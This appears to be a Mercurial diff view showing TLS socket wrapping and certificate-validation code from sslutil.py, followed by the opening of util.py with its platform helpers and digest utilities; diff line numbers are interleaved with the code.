    # WARNING: the options computed below have no effect unless the modern
    # ssl module is available. Be careful when adding options here.

    # SSLv2 and SSLv3 are broken; ban them outright. Then mask off every
    # TLS version below the configured minimum ("tls1.0" needs no mask).
    ctxoptions = ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3
    if protocol == 'tls1.1':
        ctxoptions |= ssl.OP_NO_TLSv1
    elif protocol == 'tls1.2':
        ctxoptions |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
    elif protocol != 'tls1.0':
        raise error.Abort(_('this should not happen'))

    # Prevent CRIME.
    # There is no guarantee this attribute is defined on the module.
    ctxoptions |= getattr(ssl, 'OP_NO_COMPRESSION', 0)

    return ssl.PROTOCOL_SSLv23, ctxoptions, protocol
329
329
def wrapsocket(sock, keyfile, certfile, ui, serverhostname=None):
    """Add SSL/TLS to a socket.

    This is a glorified wrapper for ``ssl.wrap_socket()``. It makes sane
    choices based on what security options are available.

    In addition to the arguments supported by ``ssl.wrap_socket``, we allow
    the following additional arguments:

    * serverhostname - The expected hostname of the remote server. If the
      server (and client) support SNI, this tells the server which certificate
      to use.

    Returns the wrapped socket, with connection metadata attached as the
    ``_hgstate`` attribute (consumed elsewhere in this module).

    Raises ``error.Abort`` on missing arguments/files, bad cipher strings,
    malformed CA files, or a silently-failed TLS handshake.
    """
    if not serverhostname:
        raise error.Abort(_('serverhostname argument is required'))

    # Fail early with an actionable message if configured cert/key files
    # have gone missing.
    for f in (keyfile, certfile):
        if f and not os.path.exists(f):
            raise error.Abort(_('certificate file (%s) does not exist; '
                                'cannot connect to %s') % (f, serverhostname),
                              hint=_('restore missing file or fix references '
                                     'in Mercurial config'))

    # Per-host security settings (protocol, CA policy, fingerprints, ...).
    settings = _hostsettings(ui, serverhostname)

    # We can't use ssl.create_default_context() because it calls
    # load_default_certs() unless CA arguments are passed to it. We want to
    # have explicit control over CA loading because implicitly loading
    # CAs may undermine the user's intent. For example, a user may define a CA
    # bundle with a specific CA cert removed. If the system/default CA bundle
    # is loaded and contains that removed CA, you've just undone the user's
    # choice.
    sslcontext = SSLContext(settings['protocol'])

    # This is a no-op unless using modern ssl.
    sslcontext.options |= settings['ctxoptions']

    # This still works on our fake SSLContext.
    sslcontext.verify_mode = settings['verifymode']

    if settings['ciphers']:
        try:
            sslcontext.set_ciphers(settings['ciphers'])
        except ssl.SSLError as e:
            raise error.Abort(_('could not set ciphers: %s') % e.args[0],
                              hint=_('change cipher string (%s) in config') %
                                   settings['ciphers'])

    if certfile is not None:
        # Passphrase callback for load_cert_chain(); prompts the user via
        # the ui with an empty default.
        def password():
            f = keyfile or certfile
            return ui.getpass(_('passphrase for %s: ') % f, '')
        sslcontext.load_cert_chain(certfile, keyfile, password)

    # ``caloaded`` records whether any CA certificates were loaded; it is
    # used below to give a better error message and is stashed in _hgstate.
    if settings['cafile'] is not None:
        try:
            sslcontext.load_verify_locations(cafile=settings['cafile'])
        except ssl.SSLError as e:
            if len(e.args) == 1: # pypy has different SSLError args
                msg = e.args[0]
            else:
                msg = e.args[1]
            raise error.Abort(_('error loading CA file %s: %s') % (
                              settings['cafile'], msg),
                              hint=_('file is empty or malformed?'))
        caloaded = True
    elif settings['allowloaddefaultcerts']:
        # This is a no-op on old Python.
        sslcontext.load_default_certs()
        caloaded = True
    else:
        caloaded = False

    try:
        sslsocket = sslcontext.wrap_socket(sock, server_hostname=serverhostname)
    except ssl.SSLError as e:
        # If we're doing certificate verification and no CA certs are loaded,
        # that is almost certainly the reason why verification failed. Provide
        # a hint to the user.
        # Only modern ssl module exposes SSLContext.get_ca_certs() so we can
        # only show this warning if modern ssl is available.
        # The exception handler is here to handle bugs around cert attributes:
        # https://bugs.python.org/issue20916#msg213479. (See issues5313.)
        # When the main 20916 bug occurs, 'sslcontext.get_ca_certs()' is a
        # non-empty list, but the following conditional is otherwise True.
        try:
            if (caloaded and settings['verifymode'] == ssl.CERT_REQUIRED and
                modernssl and not sslcontext.get_ca_certs()):
                ui.warn(_('(an attempt was made to load CA certificates but '
                          'none were loaded; see '
                          'https://mercurial-scm.org/wiki/SecureConnections '
                          'for how to configure Mercurial to avoid this '
                          'error)\n'))
        except ssl.SSLError:
            pass
        # Try to print more helpful error messages for known failures.
        if util.safehasattr(e, 'reason'):
            # This error occurs when the client and server don't share a
            # common/supported SSL/TLS protocol. We've disabled SSLv2 and SSLv3
            # outright. Hopefully the reason for this error is that we require
            # TLS 1.1+ and the server only supports TLS 1.0. Whatever the
            # reason, try to emit an actionable warning.
            if e.reason == 'UNSUPPORTED_PROTOCOL':
                # We attempted TLS 1.0+.
                if settings['protocolui'] == 'tls1.0':
                    # We support more than just TLS 1.0+. If this happens,
                    # the likely scenario is either the client or the server
                    # is really old. (e.g. server doesn't support TLS 1.0+ or
                    # client doesn't support modern TLS versions introduced
                    # several years from when this comment was written).
                    if supportedprotocols != {'tls1.0'}:
                        ui.warn(_(
                            '(could not communicate with %s using security '
                            'protocols %s; if you are using a modern Mercurial '
                            'version, consider contacting the operator of this '
                            'server; see '
                            'https://mercurial-scm.org/wiki/SecureConnections '
                            'for more info)\n') % (
                                serverhostname,
                                ', '.join(sorted(supportedprotocols))))
                    else:
                        ui.warn(_(
                            '(could not communicate with %s using TLS 1.0; the '
                            'likely cause of this is the server no longer '
                            'supports TLS 1.0 because it has known security '
                            'vulnerabilities; see '
                            'https://mercurial-scm.org/wiki/SecureConnections '
                            'for more info)\n') % serverhostname)
                else:
                    # We attempted TLS 1.1+. We can only get here if the client
                    # supports the configured protocol. So the likely reason is
                    # the client wants better security than the server can
                    # offer.
                    ui.warn(_(
                        '(could not negotiate a common security protocol (%s+) '
                        'with %s; the likely cause is Mercurial is configured '
                        'to be more secure than the server can support)\n') % (
                        settings['protocolui'], serverhostname))
                    ui.warn(_('(consider contacting the operator of this '
                              'server and ask them to support modern TLS '
                              'protocol versions; or, set '
                              'hostsecurity.%s:minimumprotocol=tls1.0 to allow '
                              'use of legacy, less secure protocols when '
                              'communicating with this server)\n') %
                            serverhostname)
                    ui.warn(_(
                        '(see https://mercurial-scm.org/wiki/SecureConnections '
                        'for more info)\n'))

            elif (e.reason == 'CERTIFICATE_VERIFY_FAILED' and
                  pycompat.iswindows):

                ui.warn(_('(the full certificate chain may not be available '
                          'locally; see "hg help debugssl")\n'))
        raise

    # check if wrap_socket failed silently because socket had been
    # closed
    # - see http://bugs.python.org/issue13721
    if not sslsocket.cipher():
        raise error.Abort(_('ssl connection failed'))

    # Record connection state on the socket; presumably consumed by later
    # certificate-validation code elsewhere in this module — consumers are
    # not visible from this chunk.
    sslsocket._hgstate = {
        'caloaded': caloaded,
        'hostname': serverhostname,
        'settings': settings,
        'ui': ui,
    }

    return sslsocket
500
500
def wrapserversocket(sock, ui, certfile=None, keyfile=None, cafile=None,
                     requireclientcert=False):
    """Wrap a socket for use by servers.

    ``certfile`` and ``keyfile`` specify the files containing the certificate's
    public and private keys, respectively. Both keys can be defined in the same
    file via ``certfile`` (the private key must come first in the file).

    ``cafile`` defines the path to certificate authorities.

    ``requireclientcert`` specifies whether to require client certificates.

    Typically ``cafile`` is only defined if ``requireclientcert`` is true.
    """
    # This function sees little use in core Mercurial, so the error
    # messaging doesn't have to be as detailed as for wrapsocket().
    for path in (certfile, keyfile, cafile):
        if path and not os.path.exists(path):
            raise error.Abort(_('referenced certificate file (%s) does not '
                                'exist') % path)

    # Baseline: TLS 1.0+ with SSLv2/SSLv3 banned.
    protocol, ctxoptions, _protocolui = protocolsettings('tls1.0')

    # This config option is intended for use in tests only. It is a giant
    # footgun to kill security. Don't define it.
    exactprotocol = ui.config('devel', 'serverexactprotocol')
    if exactprotocol == 'tls1.0':
        protocol = ssl.PROTOCOL_TLSv1
    elif exactprotocol == 'tls1.1':
        if 'tls1.1' not in supportedprotocols:
            raise error.Abort(_('TLS 1.1 not supported by this Python'))
        protocol = ssl.PROTOCOL_TLSv1_1
    elif exactprotocol == 'tls1.2':
        if 'tls1.2' not in supportedprotocols:
            raise error.Abort(_('TLS 1.2 not supported by this Python'))
        protocol = ssl.PROTOCOL_TLSv1_2
    elif exactprotocol:
        raise error.Abort(_('invalid value for serverexactprotocol: %s') %
                          exactprotocol)

    if modernssl:
        # We /could/ use create_default_context() here since it doesn't load
        # CAs when configured for client auth. However, it is hard-coded to
        # use ssl.PROTOCOL_SSLv23 which may not be appropriate here.
        sslctx = SSLContext(protocol)
        sslctx.options |= ctxoptions

        # Improve forward secrecy.
        sslctx.options |= getattr(ssl, 'OP_SINGLE_DH_USE', 0)
        sslctx.options |= getattr(ssl, 'OP_SINGLE_ECDH_USE', 0)

        # Use the list of more secure ciphers if found in the ssl module.
        if util.safehasattr(ssl, '_RESTRICTED_SERVER_CIPHERS'):
            sslctx.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0)
            sslctx.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS)
    else:
        sslctx = SSLContext(ssl.PROTOCOL_TLSv1)

    sslctx.verify_mode = (ssl.CERT_REQUIRED if requireclientcert
                          else ssl.CERT_NONE)

    if certfile or keyfile:
        sslctx.load_cert_chain(certfile=certfile, keyfile=keyfile)

    if cafile:
        sslctx.load_verify_locations(cafile=cafile)

    return sslctx.wrap_socket(sock, server_side=True)
571
571
class wildcarderror(Exception):
    """Represents an error parsing wildcards in DNS name.

    Raised by ``_dnsnamematch()`` when a presented certificate DNS name
    contains more wildcard characters than permitted.
    """
574
574
def _dnsnamematch(dn, hostname, maxwildcards=1):
    """Match DNS names according RFC 6125 section 6.4.3.

    This code is effectively copied from CPython's ssl._dnsname_match.

    Returns a bool indicating whether the expected hostname matches
    the value in ``dn``. Raises ``wildcarderror`` when ``dn`` contains
    more than ``maxwildcards`` wildcard characters in its left-most label.
    """
    if not dn:
        return False

    fragments = dn.split('.')
    leftmost, rest = fragments[0], fragments[1:]

    nwildcards = leftmost.count('*')
    if nwildcards > maxwildcards:
        raise wildcarderror(
            _('too many wildcards in certificate DNS name: %s') % dn)

    # Fast path for the common, wildcard-free case: plain case-insensitive
    # comparison.
    if not nwildcards:
        return dn.lower() == hostname.lower()

    patterns = []
    if leftmost == '*':
        # RFC 6125, section 6.4.3, subitem 1.
        # The client SHOULD NOT attempt to match a presented identifier in
        # which the wildcard character comprises a label other than the
        # left-most label. A lone '*' matches a non-empty dotless fragment.
        patterns.append('[^.]+')
    elif leftmost.startswith('xn--') or hostname.startswith('xn--'):
        # RFC 6125, section 6.4.3, subitem 3.
        # The client SHOULD NOT attempt to match a presented identifier
        # where the wildcard character is embedded within an A-label or
        # U-label of an internationalized domain name: treat it literally.
        patterns.append(re.escape(leftmost))
    else:
        # Otherwise, '*' matches any dotless string, e.g. www*
        patterns.append(re.escape(leftmost).replace(r'\*', '[^.]*'))

    # Remaining fragments are matched literally; wildcards in them are
    # deliberately not honored.
    patterns.extend(re.escape(fragment) for fragment in rest)

    matcher = re.compile(r'\A' + r'\.'.join(patterns) + r'\Z', re.IGNORECASE)
    return matcher.match(hostname) is not None
622
622
def _verifycert(cert, hostname):
    '''Verify that cert (in socket.getpeercert() format) matches hostname.
    CRLs is not handled.

    Returns error message if any problems are found and None on success.
    '''
    if not cert:
        return _('no certificate received')

    seen = []

    # subjectAltName DNS entries are checked first; the subject is only
    # consulted when the certificate carries no DNS names at all.
    for key, value in cert.get('subjectAltName', []):
        if key != 'DNS':
            continue
        try:
            if _dnsnamematch(value, hostname):
                return
        except wildcarderror as e:
            return e.args[0]
        seen.append(value)

    if not seen:
        # The subject is only checked when there is no DNS in subjectAltName.
        for sub in cert.get('subject', []):
            for key, value in sub:
                # According to RFC 2818 the most specific Common Name must
                # be used.
                if key != 'commonName':
                    continue
                # 'subject' entries are unicode.
                try:
                    value = value.encode('ascii')
                except UnicodeEncodeError:
                    return _('IDN in certificate not supported')
                try:
                    if _dnsnamematch(value, hostname):
                        return
                except wildcarderror as e:
                    return e.args[0]
                seen.append(value)

    # Nothing matched; report what the certificate actually names.
    if len(seen) > 1:
        return _('certificate is for %s') % ', '.join(seen)
    elif len(seen) == 1:
        return _('certificate is for %s') % seen[0]
    else:
        return _('no commonName or subjectAltName found in certificate')
671
671
def _plainapplepython():
    """return true if this seems to be a pure Apple Python that
    * is unfrozen and presumably has the whole mercurial module in the file
      system
    * presumably is an Apple Python that uses Apple OpenSSL which has patches
      for using system certificate store CAs in addition to the provided
      cacerts file
    """
    # Only unfrozen interpreters on darwin with a known executable qualify.
    if not pycompat.isdarwin:
        return False
    if util.mainfrozen() or not pycompat.sysexecutable:
        return False
    exe = os.path.realpath(pycompat.sysexecutable).lower()
    # Apple ships its Python at these two well-known locations.
    return exe.startswith(('/usr/bin/python',
                           '/system/library/frameworks/python.framework/'))
686
686
687 _systemcacertpaths = [
687 _systemcacertpaths = [
688 # RHEL, CentOS, and Fedora
688 # RHEL, CentOS, and Fedora
689 '/etc/pki/tls/certs/ca-bundle.trust.crt',
689 '/etc/pki/tls/certs/ca-bundle.trust.crt',
690 # Debian, Ubuntu, Gentoo
690 # Debian, Ubuntu, Gentoo
691 '/etc/ssl/certs/ca-certificates.crt',
691 '/etc/ssl/certs/ca-certificates.crt',
692 ]
692 ]
693
693
def _defaultcacerts(ui):
    """return path to default CA certificates or None.

    It is assumed this function is called when the returned certificates
    file will actually be used to validate connections. Therefore this
    function may print warnings or debug messages assuming this usage.

    We don't print a message when the Python is able to load default
    CA certs because this scenario is detected at socket connect time.
    """
    # This warning text is emitted from two places below; build it once.
    nocertswarning = _('(unable to load CA certificates; see '
                       'https://mercurial-scm.org/wiki/SecureConnections for '
                       'how to configure Mercurial to avoid this message)\n')

    # The "certifi" Python package provides certificates. If it is installed
    # and usable, assume the user intends it to be used and use it.
    try:
        import certifi
        certs = certifi.where()
        if os.path.exists(certs):
            ui.debug('using ca certificates from certifi\n')
            return certs
    except (ImportError, AttributeError):
        pass

    # On Windows, only the modern ssl module is capable of loading the system
    # CA certificates. If we're not capable of doing that, emit a warning
    # because we'll get a certificate verification error later and the lack
    # of loaded CA certificates will be the reason why.
    # Assertion: this code is only called if certificates are being verified.
    if pycompat.iswindows:
        if not _canloaddefaultcerts:
            ui.warn(_('(unable to load Windows CA certificates; see '
                      'https://mercurial-scm.org/wiki/SecureConnections for '
                      'how to configure Mercurial to avoid this message)\n'))
        return None

    # Apple's OpenSSL has patches that allow a specially constructed
    # certificate to load the system CA store. If we're running on Apple
    # Python, use this trick.
    if _plainapplepython():
        dummycert = os.path.join(
            os.path.dirname(pycompat.fsencode(__file__)), 'dummycert.pem')
        if os.path.exists(dummycert):
            return dummycert

    # The Apple OpenSSL trick isn't available to us. If Python isn't able to
    # load system certs, we're out of luck.
    if pycompat.isdarwin:
        # FUTURE Consider looking for Homebrew or MacPorts installed certs
        # files. Also consider exporting the keychain certs to a file during
        # Mercurial install.
        if not _canloaddefaultcerts:
            ui.warn(nocertswarning)
        return None

    # / is writable on Windows. Out of an abundance of caution make sure
    # we're not on Windows because paths from _systemcacerts could be
    # installed by non-admin users.
    assert not pycompat.iswindows

    # Try to find CA certificates in well-known locations. We print a warning
    # when using a found file because we don't want too much silent magic
    # for security settings. The expectation is that proper Mercurial
    # installs will have the CA certs path defined at install time and the
    # installer/packager will make an appropriate decision on the user's
    # behalf. We only get here and perform this setting as a feature of
    # last resort.
    if not _canloaddefaultcerts:
        for path in _systemcacertpaths:
            if os.path.isfile(path):
                ui.warn(_('(using CA certificates from %s; if you see this '
                          'message, your Mercurial install is not properly '
                          'configured; see '
                          'https://mercurial-scm.org/wiki/SecureConnections '
                          'for how to configure Mercurial to avoid this '
                          'message)\n') % path)
                return path

    ui.warn(nocertswarning)

    return None
777
777
def validatesocket(sock):
    """Validate a socket meets security requirements.

    The passed socket must have been created with ``wrapsocket()``.
    """
    host = sock._hgstate['hostname']
    ui = sock._hgstate['ui']
    settings = sock._hgstate['settings']

    try:
        peercert = sock.getpeercert(True)
        peercert2 = sock.getpeercert()
    except AttributeError:
        raise error.Abort(_('%s ssl connection error') % host)

    if not peercert:
        raise error.Abort(_('%s certificate error: '
                            'no certificate received') % host)

    if settings['disablecertverification']:
        # We don't print the certificate fingerprint because it shouldn't
        # be necessary: if the user requested certificate verification be
        # disabled, they presumably already saw a message about the inability
        # to verify the certificate and this message would have printed the
        # fingerprint. So printing the fingerprint here adds little to no
        # value.
        ui.warn(_('warning: connection security to %s is disabled per current '
                  'settings; communication is susceptible to eavesdropping '
                  'and tampering\n') % host)
        return

    # If a certificate fingerprint is pinned, use it and only it to
    # validate the remote cert.
    peerfingerprints = {
        'sha1': hashlib.sha1(peercert).hexdigest(),
        'sha256': hashlib.sha256(peercert).hexdigest(),
        'sha512': hashlib.sha512(peercert).hexdigest(),
    }

    def fmtfingerprint(s):
        # 'abcdef' -> 'ab:cd:ef'
        return ':'.join([s[x:x + 2] for x in range(0, len(s), 2)])

    nicefingerprint = 'sha256:%s' % fmtfingerprint(peerfingerprints['sha256'])

    if settings['certfingerprints']:
        for hashtype, fingerprint in settings['certfingerprints']:
            if peerfingerprints[hashtype].lower() != fingerprint:
                continue
            ui.debug('%s certificate matched fingerprint %s:%s\n' %
                     (host, hashtype, fmtfingerprint(fingerprint)))
            if settings['legacyfingerprint']:
                ui.warn(_('(SHA-1 fingerprint for %s found in legacy '
                          '[hostfingerprints] section; '
                          'if you trust this fingerprint, remove the old '
                          'SHA-1 fingerprint from [hostfingerprints] and '
                          'add the following entry to the new '
                          '[hostsecurity] section: %s:fingerprints=%s)\n') %
                        (host, host, nicefingerprint))
            return

        # Pinned fingerprint didn't match. This is a fatal error.
        if settings['legacyfingerprint']:
            section = 'hostfingerprint'
            nice = fmtfingerprint(peerfingerprints['sha1'])
        else:
            section = 'hostsecurity'
            # NOTE(review): 'hashtype' here is the loop variable leaked from
            # the for above, i.e. the last pinned entry's hash type; this
            # mirrors the original behavior.
            nice = '%s:%s' % (hashtype,
                              fmtfingerprint(peerfingerprints[hashtype]))
        raise error.Abort(_('certificate for %s has unexpected '
                            'fingerprint %s') % (host, nice),
                          hint=_('check %s configuration') % section)

    # Security is enabled but no CAs are loaded. We can't establish trust
    # for the cert so abort.
    if not sock._hgstate['caloaded']:
        raise error.Abort(
            _('unable to verify security of %s (no loaded CA certificates); '
              'refusing to connect') % host,
            hint=_('see https://mercurial-scm.org/wiki/SecureConnections for '
                   'how to configure Mercurial to avoid this error or set '
                   'hostsecurity.%s:fingerprints=%s to trust this server') %
                 (host, nicefingerprint))

    msg = _verifycert(peercert2, host)
    if msg:
        raise error.Abort(_('%s certificate error: %s') % (host, msg),
                          hint=_('set hostsecurity.%s:certfingerprints=%s '
                                 'config setting or use --insecure to connect '
                                 'insecurely') %
                               (host, nicefingerprint))
@@ -1,3861 +1,3861 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56
56
# C-accelerated (or pure-Python fallback) modules selected by policy.
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

# Names whose stdlib location differs between Python 2 and 3, re-exported
# from the compatibility layers under stable module-level names.
cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
stringio = pycompat.stringio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
82
82
def isatty(fp):
    """Return whether *fp* appears to be attached to a terminal.

    Objects that raise AttributeError (including those with no isatty()
    method at all) are reported as not being a tty.
    """
    try:
        result = fp.isatty()
    except AttributeError:
        return False
    return result
88
88
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

# Select the platform-specific implementation module.
if pycompat.iswindows:
    from . import windows as platform
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform
100
100
_ = i18n._

# Re-export the platform-specific implementations (posix or windows,
# selected above) under stable module-level names.
bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username
157
157
# These osutil helpers are optional: they only exist when the C extension
# provides them, so missing attributes are silently tolerated.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
166
166
# Python compatibility

# Unique sentinel used to distinguish "attribute absent" from any real value.
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
# NOTE(review): os.stat_float_times was removed in Python 3.7; this call
# presumes a Python 2 / early-3 interpreter — confirm before porting.
os.stat_float_times(False)
175
175
def safehasattr(thing, attr):
    """hasattr() variant that only treats AttributeError as "absent".

    Uses getattr with a private sentinel so exceptions other than
    AttributeError raised by properties are not swallowed.
    """
    probed = getattr(thing, attr, _notset)
    return probed is not _notset
178
178
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt via rawinput() on the given streams, returning bytes.

    sys.stdin/sys.stdout are temporarily swapped for str-wrapped versions
    of *fin*/*fout* and always restored, even on error.
    """
    origin, origout = sys.stdin, sys.stdout
    try:
        sys.stdin = encoding.strio(fin)
        sys.stdout = encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = origin, origout
186
186
def bitsfrom(container):
    """Return the bitwise OR of every flag in *container* (0 when empty)."""
    combined = 0
    for flag in container:
        combined |= flag
    return combined
192
192
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    for _modname in (r'mercurial', r'hgext', r'hgext3rd'):
        warnings.filterwarnings(r'default', r'', DeprecationWarning, _modname)
207
207
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    # +1 so the warning points at our caller, not this helper.
    warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
217
# Supported digest algorithms, mapped to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# Sanity-check that the strength ordering only names supported digests.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
228
228
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        # one live hashlib object per requested digest name
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        # feed the same data to every digest being computed
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            # BUG FIX: this previously formatted the undefined local 'k'
            # (which only resolved to a stale module-level loop variable),
            # so the error named the wrong digest. Use 'key'.
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        # DIGESTS_BY_STRENGTH is ordered strongest-first
        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
275
275
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        # pass the read through while accounting for bytes seen
        content = self._fh.read(length)
        self._got += len(content)
        self._digester.update(content)
        return content

    def validate(self):
        """Abort unless the byte count and every expected digest match."""
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
307
307
try:
    # Python 2: the builtin exists; keep referring to it.
    buffer = buffer
except NameError:
    # Python 3: emulate buffer() on top of memoryview.
    def buffer(sliceable, offset=0, length=None):
        view = memoryview(sliceable)
        if length is None:
            return view[offset:]
        return view[offset:offset + length]
315
315
# Whether subprocess pipes are opened with close_fds=True.  Only enabled on
# POSIX; presumably close_fds cannot be combined with the redirected std
# handles used below on Windows -- TODO confirm.
closefds = pycompat.isposix

# number of bytes read from the OS per _fillbuffer() call below
_chunksize = 4096
319
319
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        # wrapped pipe; reads go through os.read on its fileno()
        self._input = input
        # list of pending chunks, oldest first
        self._buffer = []
        # set once os.read returns no data
        self._eof = False
        # total number of buffered bytes across all chunks
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
